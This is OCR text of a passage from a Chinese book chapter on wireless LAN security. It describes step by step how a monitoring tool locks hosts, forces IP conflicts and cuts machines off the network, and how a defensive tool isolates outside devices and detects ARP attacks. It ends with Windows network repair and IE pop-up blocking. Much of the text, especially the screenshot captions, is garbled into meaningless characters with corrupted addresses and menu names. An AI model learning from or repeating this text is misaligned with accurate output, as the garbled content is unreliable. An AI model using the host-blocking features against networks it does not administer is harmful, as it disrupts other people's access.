ye 选项 ， 即 可 打开 “本 机 状态 
言 息 ” 窗 口 。 在 其 中 即 可 看 到 本 计算 机 的 
网 卡 参数 、IP 收 发 、TCP 收 发 、UDP 收 发 等 
信息 ， 如 下 图 所 示 。 


贸 长 角 咎 网 洛 些 控 机 二 后 栈 v3.56 
胎 同 和 讼 过 [S】 用 户 IU] 芍 帮 iD] 丰 助 [H) 
更 二 机 梳 态 | 大 本 加 用 户 | 现职 务 监 和 | 国 记录 查询 | 


同上 信息 YeTVUIT 注 将 
网 卡 笃 加 } TCP 当前 壕 撞 才 : 142 
田 heros 1 Gigabit Erhernet 10/1 | UDP 监听 :上 
一 -TIPI 忆 友 
Tcet 届 发 
TP 收发 
> = 
用 户 兰 笋 5 在 渤 6 3E 流 :0) 


Top:142 Udp:19 运行 0040450" 试用 起 二 , 杞 在 25 分 名 后 好友 自 逻 功 能 ， 


[step 轩 在 “长 角 牛 网 络 监 控 机 ”窗口 中 单 
击 “ 服 务 监测 ”选项 ， 即 可 打开 “服务 监 
测 ” 窗 口 ， 在 其 中 即 可 进行 服务 器 的 添 
加 、 修 改 、 删 除 等 操作 ， 如 下 图 所 示 。 


岂 长 角 千 网 洛 鉴 演 机 试用 本 v3.56 
持 统 条 ] 设置 [Sj】 局 户 [U] 八 芝 ID] 碌 助 [H] 
殉 本 机 太 访 | 加 本 网 用 户 地 名 务 此 | 畏 记 条 再 间 


服务 各 添加 共和 有 和 有! 十 服务 器 上 的 0 质 服 务 过 于 上 监 归 1e 立 隐 柱 当 机 3 


BB || 地 


警报 方式 


用 户 兰 数 -6 在 堵 :6 非法 :0 


Tcp':75 Udp:19 


运行 00:06'52" 试用 株 本 ， 棕 在 23 分 怨 后 地 平和 合理 及 能 . 


2. 设置 无 线 局 域 网 


除 收集 无 线 局 域 网 内 各 个 计算 机 的 信 
恩 之 外 ，“ 长 角 和牛 网 络 监控 机 ”工具 还 可 
以 对 无 线 局 域 网 中 的 各 个 计算 机 进行 网 络 
管理 ， 可 以 在 无 线 局 域 网 内 的 任 一 台 计 算 
机 上 安装 该 软件 ， 来 实现 对 整个 无 线 局 域 
网 内 的 计算 机 进行 管理 。 

其 具体 的 操作 步骤 如 下 : 
[step 加 在 “长 角 牛 网 络 监 控 机 ”窗口 中 选择 
“设置 ”一 “关键 主机 组 ”命令 项 ， 即 可 
打开 “关键 主机 组 设置 ”对 话 框 ， 在 “ 选 
择 关 键 主机 组 ”下 拉 框 中 选择 相应 的 主机 
组 ， 并 在 “组 名 称 ” 文 本 框 中 输入 相应 的 名 
称 之 后 ， 再 在 “组 内 IP” 列 表 框 中 输入 相应 
的 JP 组 。 最 后 单 击 “ 全 部 保存 ”按钮 ， 即 可 
完成 关键 主机 组 的 设置 操作 ， 如 下 图 所 示 。 
关键 主机 组 设置 x 

选择 关键 主机 组 : | 个 要 故 ;ESE 莹 几 


组 名 称 : [group #1 


组 内 IP: 
1, I0.0.0.0 |.0.0.0 3. |o.0.0.0 
4. I0.0.0.0 5. |0.0.0.0 6. 0.0.0.0 
?. j0.0.0.0 8. |0.0.0.0 9. |o.0.0.0 
10. I0.0.0.0 和 车 |0.0.0.0 I [0.0.0.0 
13. I0.0.0.0 14. .0.0.0 15. 0.0.0.0 
16., I0.0.0.0 re [0.0.0.0 18., [0.0.0.0 
全 部 保存 | 取消 | 
| 二 .一 。 人、 » 和 可 大 大 = 
千 提 示 : “关键 主机 组 ”是 由 管理 员 指 定 


的 JP 地 址 ， 可 以 是 网 关 、 其 他 计算 机 或 服务 
器 等 。 管 理 员 将 指定 的 IP 存 入 “关键 主机 
组 ”之 后 ， 即 可 令 非 法 用 户 仅 断 开 与 “ 关 
键 主机 组 ”的 连接 而 不 断 开 与 其 他 计算 机 
的 连接 。 

step 加 在 “长 角 牛 网 络 监控 机 ”窗口 中 选择 
FT 入 “默认 权限 ”菜单 项 ， 即 可 打 
开 “ 用 户 权限 设置 ”对 话 框 ， 选 择 “ 受 限 
用 户 ， 若 违反 以 下 权限 将 被 管理 ” 单 选 按 
钮 之 后 ， 设 置 “IP 限 制 ”“ 时 间 限 制 ” 和 
“组 /主机 /用 户 名 限制 ?” 等 。 这 样 当 目标 计 


第 14 章 “无线 局 域 网 的 安全 防护 一 人 


算 机 与 无 线 局 域 网 连接 时 ，“ 长 角 牛 网 络 
监控 机 ”将 按照 设 定 的 选项 对 该 计算 机 进 
行 管理 ， 如 下 图 所 示 。 


用 户 权限 设置 xX 


设置 新 月 户 默认 权限 。 
一 设置 权限 

人 自由 用 户 ， 与 网 络 连 接 不 爱 限 钊 。 

全 爱 限 用 户 ， 若 韦 民 以 下 权限 将 被 管理 。 


厂 超过 后。 二 ] 天 未 上 线 则 设 为 禁止 用 户 
个 禁止 用 户 ， 发 现 访 用户 上 线 即 管理 。 


对 违 友 以 上 权限 的 用 户 ， 将 自动 接 以 下 方式 进行 管理 。 

频率 : 3 =| 
EE 
| 殖 愿 主机 | 
”保存 | 取消 


加 7 


路 制 ?十 贴 J 关上 贴 (无 IF) ) 


中 国 攻 


可 以 利用 “长 角 牛 网 络 监控 机 ”工具 
保护 指定 的 IP 地 址 段 。 在 “长 角 和 牛 网 络 监控 
机 ”窗口 中 选择 “设置 ”一 “IP 保 护 ” 菜 单 
项 ， 即 可 打开 “IP 保 护 ” 对 话 框 。 在 其 中 设 
置 要 保护 的 IP 段 后 ， 单 击 “ 添 加 ”按钮 ， 即 
可 将 该 IP 段 添加 到 “已 受 保护 的 IP 段 ”列表 
中 ， 如 下 图 所 示 。 


IP 保 护 
人 除权 限 为“ 自由 要 幅 呈 的 用 记 处 和 其 他 也 po 


设置 受 保护 IF 
指定 IF 段 ， 
从 |192. 168.0.1 
到 j192.168.0.254 


添加 >> | 
是 除 “< | 


人 


已 受 保护 的 IT 段 : 
[01] 192. 168.0.1 - 192.168.0.254 


确定 | 取消 | 


[st 加 在 “长 角 牛 网 络 监控 机 ”工具 中 还 
可 以 设置 敏感 主机 。 在 “长 角 牛 网 络 监 控 
机 ”窗口 中 选择 “设置 ”一 “敏感 主机 ” 
菜单 项 ， 即 可 打开 “设置 敏感 主机 ”对 话 
框 ， 在 “敏感 主机 MAC” 文 本 框 中 输入 目 
标 主机 的 MAC 地 址 后 单 击 _ 六 | 按钮 ， 即 可 
将 该 主机 设置 为 敏感 主机 ， 如 下 图 所 示 。 
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设置 敏感 主机 xX 
敏感 主机 列表 : 


敏感 主机 MAC : 
|00-23-24-n9-B6-E5 >》 


确定 取 消 


[step 贺 在 “长 角 牛 网 络 监 控 机 ”窗口 中 选择 
“设置 ”一 “远程 控制 ”菜单 项 ， 即 可 打 
开 “ 远 程控 制 ” 对 话 框 ， 在 其 中 选中 “ 接 
受 远程 命令 ” 复 选 框 ， 并 输入 目标 主机 的 IP 
地 址 和 口令 后 ， 即 可 对 该 主机 进行 远程 控 
制 ， 如 下 图 所 示 。 


远程 控制 Xx 
接受 远程 命令 并 作出 相应 的 控制 操作 。 
受 控 设 置 
接受 远程 命令 
对 方 IF: | 192.168.0.102l 
对 方 端口 (TcP): | 17868 默认 端口 | 


ne: 厂 一 一 一 一 一 
有 定 | 取消 | | 更 多 ?| 


[step 图 在 “长 角 牛 网 络 监控 机 ”窗口 中 选择 
Eee 一 “主机 保护 ”菜单 项 ， 即 可 打 
开 “ 主 机 保护 ”对 话 框 ， 在 选中 “启用 主 
机 保护 ” 复 选 框 后 ， 输 入 要 保护 主机 的 IP 地 
址 和 网 卡 地 址 ， 之 后 单 击 “ 加 入 ”按钮 ， 
即 可 将 该 主机 添加 到 “ 受 保护 主机 ”列表 
中 ， 如 下 图 所 示 。 


主机 保护 Xx 


区 局 用 主机 保护 但 扩 时 度 : | 5 | 
1 
受 保 护 主 机 | 
IF 赴 杜 : [rr nD 
[E33 090.0:105 mA | - TN 106 D3-04 
网 上 地址 。 。 [eg | 移出 << | 
[0-2324 -79-3e-E 
受 保 护 未 
地 四 
a Ey 和 人 < > 
三 悍 护 全 Fo 虚拟 机 中 愤 用 ) 
三 吉 护 自身 
| nT 
| h 突 站 | 断 开 与 所 有 主机 连 | 
厂 惊 用 主机 保护 并 且 自 : 提 十 下 再 显示 
确定 


在 “长 角 牛 网 络 监 控 机 ”工具 中 还 
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可 以 添加 新 的 用 户 。 在 “长 角 牛 网 络 监控 
机 ”窗口 中 选择 “用 户 ” 一 “添加 用 户 ” 
菜单 项 ， 即 可 打开 New user 对 话 框 ， 在 
MAC 文 本 框 中 输入 新 用 户 的 MAC 地 址 后 ， 


单 击 “保存 ”按钮 即 可 实现 添加 新 用 户 操 
作 ， 如 下 图 所 示 。 
a 


WC: |00-10-24-56-89-D£ 
注释 : | 手工 加 入 ，2017-08-15 09:50。 


权限 设置 | | 保存 | | 取消 | 


在 “长 角 牛 网 络 监控 机 ”窗口 中 选择 
“用 户 ” 一 “远程 添加 ”菜单 项 ， 即 可 打 
开 “ 远 程 获取 用 户 ” 对 话 框 ， 在 其 中 输入 远 
程 计 算 机 的 他 地 址 、 数 据 库 名 称 、 登 录 名 称 以 
及 口令 之 后 ， 单 击 “ 连 接 数 据 库 ? 按钮 ， 即 
可 从 该 远程 主机 中 读 取 用 户 ， 如 下 图 所 示 。 

和 
数据 库 名 称 : EB 


登录 名 称 : [sa 
al | | 


节 取 的 用 户 莪 据 


这 接 数 据 库 
选 笃 表 : | "| 
庄 拼 对 应 字段 名 : 


如 果 禁 止 无 线 局 域 网 内 某 一 人 台 计 算 机 
的 网 络 访问 权限 ， 则 可 在 “长 角 牛 网 络 监 
控 机 ”窗口 内 右 击 该 计算 机 ， 在 弹出 的 快 
捷 菜 单 中 选择 “锁定 /解锁 ”选项 ， 即 可 打 
开 “ 锁 定 /解锁 ”对 话 框 ， 如 下 图 所 示 。 
钦定 / 解 钢 xX 
网 卡 : |68-FB-?7E-EA-FC-FA [的 卡 生产 厂家 不 详 ] | 
注释 : 网 卡 生产 厂家 不 详 
请 不 要 对 者 如 路 由 器 、 交换 机 及 计 吕 等同 络 关键 设备 进行 包 定 。 
锁定 方式 : 
CO 不 锁定 【解锁 ) 
个 禁止 与 以 下 关键 主机 组 的 TCP/IP 巡 接 
厂 第 1 厂 第 2 万 第 厂 第 4 组 
[| 第 5 「 第 6 国 乔 -， 国有 
@ 禁止 与 所 有 主机 的 TCP/TP 连 接 ( 除 敏 感 主机 外 ) 


确 定 | 取消 | 


设置 


在 其 中 选择 目标 计算 机 与 其 他 计算 机 

(或 关键 主机 组 ) 的 连接 方式 之 后 ， 单 击 
“确定 ”按钮 ， 即 可 禁止 该 计算 机 访问 相 
应 的 连接 ， 如 下 图 所 示 。 


二 其 用 咎 网 络 监 溢 机 试用 版 v3.56 一 口 x 
系统 站 设 概 [5] 用户 [U] 数据 ID] 其 助 串 


加 不 机 #3 ”时 丰 3 用 户 | 加 于 关 监 导 | 起 记录 去 肖 | 


FE 
二 15 09:37: 由 


全 4-63-CI-33-60-13 上 ge. 486. 0.1 一 一 
00-3-24-19-B6-P5 192. 166 0.105 [DFI5HDUP /IFSHMTOP ?0L7-09-]5 09:37:46 一 
BC-60-00-90-CC 01 吕 192. 168. 0.12 WOEE380UE 7 APUIGG... 2017-06- 才 0 37.d6 一 
(全 56-5-e4-FTB-56-10 | 192. 166 0 Lc7 tO [网 绢 反 展 * 主 控 器 ] N 20L7-06-15 09:37: 柜 一 
-dDL-D3-48-78 虽 192. 166. 0. 100 节 一 20L7-06-15 09:37:d7 一 
(31-50-36-17-01 | 192. 1656 0 LC3 上 局 一 20L7-08-15 09:39.27 一 


W000-10-24-55-69-0£ 


后 户 伟 数 ;8 在 法 ;7 非法 必 运行 00:16'28” 试 思 酸 本 ,将 在 13 分 机 后 千克 管理 也 


在 “长 角 牛 网 络 监控 机 ”窗口 内 选中 

侣 计算机 信息 并 右 击 ， 在 弹出 的 快捷 菜单 
中 选择 “手工 管理 ”选项 ， 即 可 打开 “手工 
管理 ”对 话 框 ， 在 其 中 即 可 手动 设置 对 该 计 
算 机 的 管理 方式 ， 如 下 图 所 示 。 


手工 管理 xX 


Tcp:53 Udp:19 


Static 


网 卡 : |68-FB-7E-EA-FC-FA [网 下 生产 三 家 不 详 ] 
注释 : | 网 卡 生产 厂家 不 详 


IP: |192. 168. 0. 105 


名 和 :Fr7-7-，，，， 


洲 击 : 
请 不 要 对 诸如 路 由 器 、 交 换 机 、 服务 器 等 网 络 关键 设备 进行 管理 。 


管理 方式 
是 IF 冲突 
1_ 芋 止 与 天 键 主机 组 进行 TCF 连接 
厂 第 组 厂 第 间 。 厂 第 组 厂 第 组 。 [EE 
1 第 5 组 「 第 65 [ 第 ?7 强 六 弟 8 组 敏感 主机 


三 禁止 与 所 有 主机 进行 TCPAIP 连 接 ( 除 敏感 主机 外 ) 


断 开 方式 | 静默 断 开 ”| 厂 高 级 阻 断 
管理 频率 : | 12 -| 帮助 | 


开始 | | 结束 | 


[seep 轿 在 “长 角 牛 网 络 监 控 机 ”工具 中 还 可 
以 给 指定 的 主机 发 送 消 息 。 在 “长 角 牛 网 
络 监 控 机 ”窗口 中 选中 某 台 计算 机 信息 并 
单 击 鼠 标 右键 ， 在 弹出 的 快捷 菜单 中 选择 
“发 送 消息 ”选项 ， 即 可 打开 Send message 
对 话 框 ， 在 其 中 输入 要 发 送 的 消息 后 ， 单 
击 “ 发 送 ” 按钮 ， 即 可 给 该 主机 发 送 指定 
的 消息 ， 如 下 图 所 示 。 


管理 次数 :0 


第 14 章 ”无线 局 域 了 网 的 安全 防护 86。:。 


Send message X 
消 外 只 有 开启 了 消息 服务 ， 并 且 被 正确 取出 名 称 的 用 户 ， 才 能 接收 到 此 
发 送 至 : [4a0-A5-EF-DE-A9-D3 [网 卡 生产 厂 家 不 详 ] 


IF: [192.168.0.108 
名 称 : [WORKGROUP / 网络 科技 / 网 络 科技 


发 送 者 ; [长 角 牛 网 络 监控 机 
接收 者 : 网络 科技 
发 送 次 数 : [1 二。 如 注册 版 能 设置 发 送 者 名 称 及 发 送 次 数 。 
正文 : | 你 好 


发 送 | 结束 | 


14.4.3 大势 至 局 域 网 安全 卫士 


大 势 至 局 域 网 安全 卫士 是 一 款 专 业 的 
局 域 网 安全 防护 系统 ， 它 能 够 有 效 地 防止 
外 来 计算 机 接 入 公司 无 线 局 域 网 ， 有 效 隔 
离 无 线 局 域 网 计算 机 ， 并 且 还 有 禁止 计算 
机 修改 了 P 和 MAC 地 址 、 检 测 局 域 网 混杂 模 
式 网 卡 、 防 御 局 域 网 ARP 攻 击 等 功能 。 

使 用 大 势 至 局 域 网 安全 卫士 防护 系统 
安全 的 操作 步骤 如 下 。 
下 载 并 安装 大 势 至 局 域 网 安全 卫士 ， 
即 可 打开 “大 势 至 局 域 网 安全 卫士 ”工作 
界面 ， 如 下 图 所 示 。 


贺 大 热 至 后 域 网 安全 卫士 V3.1 - 试用 版 一 口 Xx 
关于 软件 ”关于 我 们 ” 访 同 官网 ”购买 沉 程 了 鸡 系 我 们 大助 《远程 协助 
请 选择 网 卡 Jetyork sdapter “请 theros AtcLOD1 Gigabit Fthernet Controllar vv 开始 监控 
白 名 单 \ 色 公司 内 部 中 , 陪 ) 操作 
| “主机 枯 坊 “硬件 地 址 工地 址 主机 名 所 癌 
号 入 
与 出 
旱 除 
清空 
移 至 思 名 单 
自动 电 高 外 未 电脑 /手机 ,平板 | 检 独 自动 隔 谢 局 司 网 无 线路 由 器 检测 
后 ] 白 名 单 下 地址 训 更 时 自动 遇 高 白 名 单 Wc 地 址 变更 时 自动 隔离 
回 点 现 AETF 攻 击 时 输出 等 报信 息 发 现 局 域 隐 AEP 攻 击 上 时 自动 隅 高 
岂 检测 开 阳 训 局 域 隐居 班 探测 | 操作 
霖 名 单 踢 I 公司 外 部 电脑 ) 一 
读 择 ”主机 装 态 “和 神 件 地 址 。 ”于 地 址 弄 竹 时 间 和) ER 
隔离 方式 
目 动 隔离 
手动 隔离 
强制 隅 高 
隔离 选项 
芭 止 访问 内 网 
禁止 访问 处 网 
阅 络 安全 事件 查看 历史 记录 利空 狠 出 记录 
[本 地 开 EE 二 
口 强 加 中 口 罚 


[step 图 单 击 “ 开 始 监 控 ” 按 钮 ， 即 可 开始 
ye Mere Me 
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黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


于 无 线 局 域 网 外 的 计算 机 将 显示 在 “ 黑 名 
单 ” 窗 格 之 中 ， 如 下 图 所 示 。 


加 六 势 至 后 域 网 安全 卫士 V3.1 - 试用 版 一 口 x 
关于 软件 ”关于 我 们 ”访问 言 网 ”购买 济 层 。 联系 我 们 如 助 ”远程 协助 


请 选择 网 卡 了 etvork adapter “Athecos AtdDD1 Gigabit Ethernet Centroller ~ 
自 加 单 [ 即 公 司 内 部 电 拍 ) 操作 
主机 状态 证 他 地 址 IF 闻 站 主机 为 增加 
导入 
导出 
肿 且 
清空 
物 平 时 名 单 
自动 霹 离 外 未 电 , 锌 * 手 机 * 平 板 | 检 贡 | 过 自 邳 训 局 | 好 EE 绕 队 由 器 | 检 乔 
回 白 名 单 T? 地 址 冶 更 时 自动 新 高 区 白 吉 单 WAC 志 址 变更 时 自 纯 珊 襄 
回 星 现 MAR? 忒 击 时 锦 出 密 报 译 息 发 现 虽 域 网 X37 攻击 时 自动 光 高 
思 究 贡 并 崩 高 虽 域 网 代 时 琛 出 ， 回 袜 现 到 昌 杂 入 式 网 卡 时 f 客 | 格 斑 | 操作 
里 名 单 * 即 公司 外 部 电脑 ) 
: 至 白 名 
这 择 “主机 六 态 世人 地 址 。”。。 卫 地 直 草 休 时 目 (和 EE 
后 高 方式 
| 口 网 。 4nh5EFnEhsn3 i192 155.0 103 300 | 日 二 RB 
口 加 coaoooscccl |192. 166.0.112 am | 加 手术 届 祝 
口 副 。 onz3z4n3aB5E5 192 16.0.105 300 | 强 由 高 
局 高 迁 页 
问 基 止 访问 内 网 
问 基 止 访 i 册 | 网 
网 络 安全 事 片 查看 历史 记录 洛 空 加 出 记录 
ET 五 据 坟 则 高 力 区 
(强国 中 心 ] 映 


如 果 确 定 某 台 计 莽 机 是 无 线 局 域 网 内 的 
计算 机 ， 则 可 以 在 “ 黑 名 单 ” 窗 格 中 选中 该 计 
算 机 信息 ， 然 后 单 击 “ 移 至 白 名 单 ” 按 钮 ， 将 
其 移动 到 “ 白 名单 ” 窗 格 之 中 ， 如 下 图 所 示 。 


较 六 势 至 后 域 网 安全 卫士 V3,.1 - 试用 版 一 口 x 
关于 软件 ”关于 我 们 访问 言 网 ”购买 流 避 ”联系 我 们 ” 寿 助 《远程 协 助 
请 选择 FI 在 Wetyork adapter Atharos AtcdDDl Gigabit Ethernet Controller v 省 止 监控 
日 名 单 [ 即 当 司 内 部 电 挡 ) 说 作 
“| 主机 业态 ” 评 件 地 址 IZ 书 站 主机 名 二 加 
1 [| |40asgFDEaAa03 192 156 
2 | 副 0023z403Bs5F5 L92 156 0 106 导入 
号 出 
肿 际 
清空 
移 玉 时 名单 
自动 而 高 站 来 电 涪 /手机 平板 | 术 出 | 巴 自 纯 训 局 晤 dE 浇 陪 由 器 | 接 囊 
回 白 铝 单 I7 地 址 净 更 时 自动 沁 离 区 和 白 名 单 Xwr 地 址 讼 更 时 自 反 了 品 密 
同 发 现 3? 攻 击 时 辆 出 嘱 报 信息 发 现 局 域 同 XRT 或 击 时 自动 沛 高 
回 榨 列 寺 后 高 局 域 同 代理 竣 测 加 接 测 和 到 混 洒 盾 东 网卡 时 拒 获 。， 检 齐 揉 作 
黑 名 单 ( 即 从 司 外 部 电脑 ) 
| 选择。 主机 捧 访 ”机 必 地址 _ 了 地 站 条 余 时 站 “和 镍 ) 
口 副 55FD5dFH5al0 /192 .160.0.107 ja | 后 高 方式 
四 村 casoon3ccc0l 192 160.0.112 (294 EE da 
过 抽 角 有 
口 加 Attnln3497B |192 169.0.100 |300 | 强 遇 访 
局 融 送 而 
[3 桂 止 访问 内 阿 
问 本 止 太 io 
网 络 实 全 事件 查看 历史 记录 汕 空 圈 册 记录 
乔 们 地 让 二 ee 
四 强 轩 中 口 羽 


step 加 单 去 “自动 隔离 局 域 网 无 线路 由 器 ” 
右 侧 的 “检测 ”按钮 ， 可 以 检测 当前 无 线 
局 域 网 中 存在 的 无 线路 由 器 设备 信息 ， 并 
在 “网 络 安 全 事件 ” 窗 格 中 显示 检测 结 
果 ， 如 下 图 所 示 。 
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图 六 的 至 后 域 网 安全 卫士 V3.1 - 试用 版 一 口 Xx 
关于 软件 。 关于 我 们 访问 官网 。 购 顽 沪 程 。 联 至 伯 们 ”帮助 远 竹 协 贡 
请 选择 网 卡 Jetyork sdapter " Atheros AtcLOD1 Gigabit Ethernet Controller ~ 开始 监控 
白 名 单 亿 [公司 内 部 电脑 ) 操作 
”| 主机 酚 态 硬件 坝 让 TP 地 址 主机 名 | 增加 
! 圆 。 40A67TIEA5D3 152.165.0.106 一 
,: 局 = 
导出 
归队 
清空 
移 至 思 名 单 
自 郝 电离 外 来 电脑 /手机 ,平板 | 检 则 | 加 自动 隔 痪 局 可 到 无 线路 由 器 
回 白 名 单 王 地 址 训 更 时 自 大 遇 高 白 名 单 JW 地 址 训 更 时 自动 隔 高 
器 太 现 AEF 攻 击 时 坦 出 警报 信息 发 丽 局 霹 网 本 FP 攻 击 果 自 下 隔 离 
MM] 术 测 讶 隔 高 局 域 网 居 理 探测 榨 出 竺 上 E 杂 芒 式 网 卡 时 报警 。” 痊 和 操作 
墨 名 单 恨 I 公 司 外 部 电脑) 
移 
这 永 ”主机 以太 祷 了 元 四。 二 节 引 ey RE 
隔 高 方式 
目 动 阳 赢 
手 冯 了 前 高 
强制 隅 高 
隔离 选 页 
区 止 访问 内 网 
中 荣 止 访问 外 网 
网 络 安 全 事件 亚 看 历史 记录 “ 理 空 话 出 记录 
硕 生 地 了 据 玉 抽 力 民 一 一 
» 1 166.0 104 | 检测 ae :00-12-60-AD-13-. . O 强 加 中 丫 罚 
C3-80-0-9C—... 192.183.0.112 ae :[8-60-00-5CAC—... 


[step 图 单 击 “ 查 看 历史 记录 ”按钮 ， 即 可 打 
开 “IPMAC- 记 事 本 ”窗口 ， 在 其 中 查看 检 
测 结 果 ， 如 下 图 所 示 。 


居 IPMAC - 记事 本 一 口 X 

文件 (日 ”编辑 (E) 枪 F(O) 但 圭 (V) 帮助 (H) 

| 人 ac: 00-1E-8C-AD-13-5F, 

仿 视 | 全 lac:C8-60-00-9C-CC-D1, 
测 全 Mac:84-BE-52-3B-17-01, 

IP: 192. 168. 0. 104 


科 测 到 Jac:C8-60-00-9C-CC-D1，IP:192. 168. 0. 112n 


大 势 至 局 域 网 安全 卫士 常用 功能 介绍 
如 下 。 

(1) 
平板 ” 复 选 框 : 禁止 外 部 计算 机 (如 笔记 
本 ) 或 移动 设备 (如 平板 计算 机 或 手机 ) 
接 入 单位 无 线 局 域 网 访问 因特网 。 


“ 目 动 隔离 外 来 计算 机 /手机 / 


(2) “自动 隅 离 无 线 局 域 网 无 线路 由 
右 ” 复 选 框 : 当 检 测 到 无 线 局 域 网 中 存在 
无 线路 由 器 时 ， 上 自动 将 其 隔离 。 

(3) “ 白 名 单 IP 地 址 变更 时 自动 隔 
离 ” 复 选 框 : 禁止 单位 内 部 计算 机 修改 IP 地 
址 ， 防 止 IP 地 址 次 用， 防止 IP 冲 突 攻 击 ， 防 
止 越权 上 网 或 逃避 网 络 监 控 。 


(4) “ 白 名 单 MAC 地 址 变更 时 自动 
隔离 ” 复 选 框 : 禁止 单位 内 部 计算 机 修改 
MAC 地 址 。 

(5) “发 现 ARP 攻 击 时 输出 报警 信 
息 ” 复 选 框 ， 当 发 现 ARP 攻 击 时 ， 输 出 报警 
信息 。 

(6) “发 现 无 线 局 域 网 ARP 攻 击 时 自 
动 隔离 ” 复 选 框 ， 当 检测 到 无 线 局 域 网 中 
存在 ARP 攻 击 时 ， 上 自动 将 发 出 ARP 攻 击 的 
计算 机 隔离 。 

(7) “检测 并 隔离 无 线 局 域 网 代理 ” 
复 选 框 : 检测 无 线 局 域 网 中 是 否 存 在 代理 
服务 器 ， 一 旦 检测 到 就 会 将 其 隔离 。 

(8) “检测 到 混杂 模式 网 卡 时 报警 ” 
复 选 框 : 检测 无 线 局 域 网 内 处 于 混杂 模式 
的 网 卡 ， 防 止 无 线 局 域 网 计算 机 运行 黑客 
软件 、 嗅 探 软 件 、 抓 包 软 件 等 ， 当 检测 出 
来 后 给 出 报警 信息 。 


14.5 ”实战 演练 
实战 演练 1 一 一 诊断 和 修复 网 络 不 通 


当 目 己 的 计算 机 不 能 上 网 时 ， 说 明 计 
算 机 与 网 络 连 接 不 通 ， 这 时 就 需要 诊断 和 
修复 网 络 了 ， 有 具体 的 操作 步骤 如 下 。 
[step 加 打开 “网 络 连接 ”窗口 ， 选 中 需要 诊 
断 的 网 络 图 标 并 右 击 ， 在 弹出 的 快捷 菜单 
中 选择 “诊断 ”选项 ， 弹 出 “Windows 网 络 
诊断 ”窗口 ， 并 显示 网 络 诊断 的 进度 ， 如 下 
图 所 示 。 


汪 Windows 网 络 诊断 


正在 检测 问题 
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step 图 诊断 完成 后 ， 将 会 在 下 方 的 窗 格 中 显 
示 诊 断 的 结果 ， 如 下 图 所 示 。 


司 Windows 网 络 涂 断 
其 余 修复 操作 需要 具有 管理 员 权限 


已 找到 问题 
适配器 ' 以 太 网 "已 禁用 四 


四 兰 试 以 管理 员 身份 进行 这 些 修复 
一 浏览 其 他 选项 


查 乔 详细 信息 


关闭 
单 击 “尝试 以 管理 员 身 份 进行 这 些 修 


复 ” 和 链接 ， 即 可 开始 对 诊断 出 来 的 问题 进 
行 修复 ， 如 下 图 所 示 。 


司 Windows 网 络 涂 断 


正在 解决 问题 


正在 验证 是 否 已 解决 网 络 适 配器 配置 问题 ... 


修复 完毕 后 ， 会 给 出 修复 的 结果 ， 提 
示 用 户 疑 难 解答 已 经 完成 ， 并 在 下 方 显 示 
已 修复 信息 提示 ， 如 下 图 所 示 。 


司 Windows 网 络 涂 断 


疑难 解答 已 充 成 
宪 难 甫 答 已 对 系统 进行 了 一 毕 齐 改 。 请 兰 坛 之 彰 曾 兰 试 执行 的 任务 。 


已 找到 问题 


适配器 以太 网 "已 禁用 已 修复 @ 


一 关闭 疑难 解答 
一 浏览 其 他 选项 


查看 详细 信息 
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二 >， 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


实战 演练 2 一 一 屏蔽 网 页 广告 弹 窗 


Interest Explorer 11 浏 览 器 具有 屏蔽 网 
页 广告 弹 窗 的 功能 ， 使 用 该 功能 屏蔽 网 页 
广告 弹 窗 的 操作 步骤 如 下 。 
在 IE 11 浏 览 器 的 工作 界面 中 选择 “ 工 
具 ” 一 “弹出 窗口 阻止 程序 ”菜单 命令 ， 
如 下 图 所 示 。 


xX 
吾 话 国 -图 https:iivwwr 记 恒 儿 | 图 百度 一 下 ,你 由 和 区 
文件 日 ”六 sE】 音 石 | 必 训 大 车 
删除 浏览 历 守 记录 {DD],， 
InPrivate SEIl) 


Ctri+Shift+Del 
Ctr+shit+P 民 虎 ”上 贴 到 余 录 。、 进 置 更 多 产品 
关闭 中 距 旦 护 ( 入 

ActiveX 牙 运 [四 

修 鼠 注 芒 问 时 IO) 

健生 打 二 上 次 浏览 交 闸 [9) 


dd 
音乐 
检 关 点 添加 于 人 应 用 机 周 从 


天 轨 下 葛 !N) Crl+) 


慰 
着 
i 


Ctrl+Shift+U 


也 
Fo 
: 
= 
1 


和 
! 对 


打开 “弹出 窗口 阻止 程序 ”对 话 框 ， 
提示 用 户 是 否 确 实 要 启用 Interest Explorer 弹 
出 窗口 阻止 程序 ， 如 下 图 所 示 。 


弱 出 窗口 上 胆 止 程序 


Ci 确实 要 启用 Intemet Explorer 弹 痊 口 旧 止 程序 司 ? 


sm | 


单 击 “是 ”按钮 ， 即 可 启用 该 功能 ， 
然后 选择 “工具 ”一 “弹出 窗口 阻止 程 
序 ” 一 “弹出 窗口 阻止 程序 设置 ”菜单 命令 ， 
如 下 图 所 示 。 


x 
去 底 轩 -图 https:i/wwmw 襄 " 久 | 阅 百 康 一 下 , 你 迪克 | 是 

文件 日 总 sE】 音 石 |。 必 六 二) 车 
删除 浏览 历 裤 记 委 (D0). Ctrl+ShiftDel 
到 产品 


Inprivate 浏 过 中 
关闭 中 后 曙 芒 ( 风 

ActiveX 千 运 [X] 

入 苦 注 流 问 是 (C) 

畦 辆 打开 上 次 浏览 克 四 [S$) 
棕 时 点 添 可 于 应 用 "机 同人 
至 加 下 喜 !N) Cyl+) 


Ctrl+Shif+U 


报告 网 站 问 晤 (R Me 0301735 
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打开 “弹出 窗口 阻止 程序 设置 ”对 话 
框 ， 在 “要 允许 的 网 站 地 址 ”文本 框 中 输 
入 允许 的 网 站 地 址 ， 如 下 图 所 示 。 


弱 出 窗口 阻止 程序 设置 Xx 


例外 
] 绊 出 窗口 当前 已 被 阳 止 。 你 可 以 将 特定 网 站 添加 到 下 胡 中 ， 从 而 允许 未 自 
.天 该 站 点 的 弹出 窗口 . 


要 允许 的 网 站 地 址 IW): 


https://www.taobao.com 


允许 的 站 点 (S): 
得 除 (R) 


主 部 利 除 [E)..， 


朋 知 和 阻止 级 别 : 
胆 目 滋 出 客 口 时 爱 放 声 莒 [站 ). 
阻止 洋 出 窗口 时 时 二 尖 和 | 栏 (N). 
旧 止 党 到 (8): 
中 ; 胆 止 大 多 数 自 动 洋 出 窗口 


关闭 (OQ) 


单 击 “ 添 加 ”按钮 ， 即 可 将 输入 的 网 
站 地 址 添加 到 “允许 的 站 点 ”列表 当中 。 
单 击 “ 关 闭 ” 按 钮 ， 即 可 完成 弹出 窗口 阻 
止 程序 的 设置 操作 ， 如 下 图 所 示 。 


